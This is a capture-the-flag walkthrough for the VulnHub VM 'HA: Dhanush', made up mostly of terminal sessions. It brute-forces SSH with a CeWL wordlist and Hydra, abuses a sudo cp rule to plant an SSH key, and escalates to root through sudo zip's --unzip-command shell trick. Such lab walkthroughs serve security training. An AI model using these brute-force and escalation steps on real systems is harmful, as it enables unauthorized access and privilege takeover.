HA_DHANUSH – (VULNHUB)

VM Link: http://download.vulnhub.com/ha/dhanush.zip

root@kali:~/Downloads# nmap -A 192.168.135.131
Starting Nmap 7.80 ( https://nmap.org ) at 2019-11-30 16:12 GMT
Nmap scan report for 192.168.135.131
Host is up (0.00032s latency).
Not shown: 999 closed ports
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: HA: Dhanush
MAC Address: 00:0C:29:22:66:8B (VMware)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 – 4.9
Network Distance: 1 hop

TRACEROUTE
HOP RTT ADDRESS
1 0.32 ms 192.168.135.131

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 8.27 seconds

on browser

http://192.168.135.131/

root@kali:~/Downloads# cewl http://192.168.135.131/ -w dict.txt
CeWL 5.4.6 (Exclusion) Robin Wood (robin@digi.ninja) (https://digi.ninja/)
root@kali:~/Downloads# cat dict.txt
Dhanush
धनुष
Lord
Feature
Wielded
the
यदा
युगे
Arjuna
was
able
his
and
Then
path
The
Header
लानिर
भवति
भारत
युत
थानमधर
तदात
मानं
सृजाम
यहम
परित
राणाय
साधूनां
विनाशाय
दुष
कृताम
मसंस
थापनार
थाय
भवामि
What
Banner
Dhanushधनुष
Weapon
for
shooting
arrows
typically
made
curved
piece
wood
joined
both
ends
Taut
String
दुनिया
सबसे
तिशाली
धनुषWorld
Most
Powerful
Dhanushs
Sharang
Dhanushसारंग
Vishnu
Made
Viswakarma
Pinak
Dhanushपिनाक
ShivaMade
pinak
Gandiv
Dhanushगाण
डीव
ArjunaMade
Brahma
Portfolio
Choose
Yoursअपना
चुनें
Heat
Mahabharata
not
lift
against
Family
Gurus
Krishna
tells
him
this
Dhram
Eternal
Truth
war
You
CTF
Warrior
Pick
your
attain
Boot
Hacking
Articles
All
rights
reserved
Scripts
Raj
Aarti
Geet
Yashika
Kavish
Rishab
Japneet
Pavan

root@kali:~/Downloads# hydra -L dict.txt -P dict.txt 192.168.135.131 ssh -s 65345 -e nsr
Hydra v9.0 (c) 2019 by van Hauser/THC – Please do not use in military or secret service organizations, or for illegal purposes.

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2019-11-30 16:33:55
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 16 tasks per 1 server, overall 16 tasks, 13338 login tries (l:114/p:117), ~834 tries per task
[DATA] attacking ssh://192.168.135.131:65345/
[STATUS] 214.00 tries/min, 214 tries in 00:01h, 13127 to do in 01:02h, 16 active
[STATUS] 149.33 tries/min, 448 tries in 00:03h, 12893 to do in 01:27h, 16 active

login : pinak
password : Gandiv

root@kali:~/Downloads# ssh pinak@192.168.135.131 -p 65345
The authenticity of host ‘[192.168.135.131]:65345 ([192.168.135.131]:65345)’ can’t be established.
ECDSA key fingerprint is SHA256:QVJEE1sfL5RUI7RaUefp0Cr9woMla1AyMzYAY683i5s.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added ‘[192.168.135.131]:65345’ (ECDSA) to the list of known hosts.
pinak@192.168.135.131’s password: Gandiv
Welcome to Ubuntu 18.04.3 LTS (GNU/Linux 4.15.0-55-generic x86_64)

* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage

Last login: Fri Nov 8 09:05:56 2019

pinak@ubuntu:~$

pinak@ubuntu:~$ sudo -l
Matching Defaults entries for pinak on ubuntu:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User pinak may run the following commands on ubuntu:
(sarang) NOPASSWD: /bin/cp
pinak@ubuntu:~$ cd /home/sarang
pinak@ubuntu:/home/sarang$ ls -la
total 32
drwxr-xr-x 4 sarang sarang 4096 Nov 8 08:03 .
drwxr-xr-x 5 root root 4096 Nov 7 21:01 ..
-rw——- 1 sarang sarang 1 Nov 8 09:07 .bash_history
-rw-r–r– 1 sarang sarang 220 Nov 7 21:01 .bash_logout
-rw-r–r– 1 sarang sarang 3771 Nov 7 21:01 .bashrc
drwx—— 2 sarang sarang 4096 Nov 7 21:07 .cache
-rw-r–r– 1 sarang sarang 807 Nov 7 21:01 .profile
drwx—— 2 sarang sarang 4096 Nov 7 21:35 .ssh
pinak@ubuntu:/home/sarang$ cd .ssh
-bash: cd: .ssh: Permission denied

pinak@ubuntu:/home/sarang$ ssh-keygen
Generating public/private rsa key pair.
Enter file in which to save the key (/home/pinak/.ssh/id_rsa):
Created directory ‘/home/pinak/.ssh’.
Enter passphrase (empty for no passphrase):
Enter same passphrase again:
Your identification has been saved in /home/pinak/.ssh/id_rsa.
Your public key has been saved in /home/pinak/.ssh/id_rsa.pub.
The key fingerprint is:
SHA256:6zFqbvYav9knzOEEKvi/1SM+ZhauqGHol/So7qX4Lwc pinak@ubuntu
The key’s randomart image is:
+—[RSA 2048]—-+
| |
| |
| |
| . |
| . .S. |
| .E.. . .oo |
|. +++…**o. |
|o.+=oo+B**=.. |
|+B==o*BOBo.o |
+—-[SHA256]—–+

pinak@ubuntu:/$ cd ~/.ssh
pinak@ubuntu:~/.ssh$ ls -la
total 16
drwx—— 2 pinak pinak 4096 Nov 30 08:54 .
drwxr-xr-x 4 pinak pinak 4096 Nov 30 08:54 ..
-rw——- 1 pinak pinak 1675 Nov 30 08:54 id_rsa
-rw-r–r– 1 pinak pinak 394 Nov 30 08:54 id_rsa.pub

pinak@ubuntu:~/.ssh$ chmod 777 id_rsa.pub
pinak@ubuntu:~/.ssh$ cp id_rsa.pub /home/pinak
pinak@ubuntu:~/.ssh$ cd ..

pinak@ubuntu:~$ sudo -u sarang /bin/cp ./id_rsa.pub /home/sarang/.ssh/authorized_keys
pinak@ubuntu:~$ ssh sarang@127.0.0.1 -i /.ssh/id_rsa -p 65345
Warning: Identity file /.ssh/id_rsa not accessible: No such file or directory.
The authenticity of host ‘[127.0.0.1]:65345 ([127.0.0.1]:65345)’ can’t be established.
ECDSA key fingerprint is SHA256:QVJEE1sfL5RUI7RaUefp0Cr9woMla1AyMzYAY683i5s.
Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added ‘[127.0.0.1]:65345’ (ECDSA) to the list of known hosts.
Welcome to Ubuntu 18.04.3 LTS (GNU/Linux 4.15.0-55-generic x86_64)

* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage

Last login: Thu Nov 7 21:35:24 2019 from 192.168.0.100
sarang@ubuntu:~$ sudo -l
Matching Defaults entries for sarang on ubuntu:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User sarang may run the following commands on ubuntu:
(root) NOPASSWD: /usr/bin/zip

sarang@ubuntu:~$ touch raj
sarang@ubuntu:~$ pwd
/home/sarang
sarang@ubuntu:~$ sudo zip /tmp/raj.zip /home/sarang/raj -T –unzip-command=”sh -c /bin/bash”
adding: home/sarang/raj (stored 0%)
root@ubuntu:~# cd /root
root@ubuntu:/root# ls
flag.txt
root@ubuntu:/root# cat flag.txt

@p
@@@.
@@@@@
@@@@@@@
*”`]@P ^^
]@P
]@P
,,,, ]@P ,,gg,,
g@@@@@@@@@b ]@P ,@@@@@@@@@@g,
,@@@@@@BNPPNB@@@@@@@@@@@@@@@@P**PNB@@@@@w
g@@@@P^` %NNNNN@NNNNNP *B@@@g
g@@@P` -@ “B@@w
,@@@` ]@ %@@,
@@P- ]@ *@@,
,@@” ]@ *B@
,@N” y@@B %@,
,, g@P- ]@@@P *Bg ,gg
@@@@$,,,,,,,,,,,,,,,,,,,,,,,,,,ggggg@@@@wwwwwwwwwgggggggggww==========mm4NNN”

!! Congrats you have finished this task !!

Contact us here:

Hacking Articles : https://twitter.com/rajchandel/
Nisha Sharma : https://in.linkedin.com/in/nishasharmaa

+-+-+-+-+-+ +-+-+-+-+-+-+-+
|E|n|j|o|y| |H|A|C|K|I|N|G|
+-+-+-+-+-+ +-+-+-+-+-+-+-+
____________________________________

@SAKSHAM DIXIT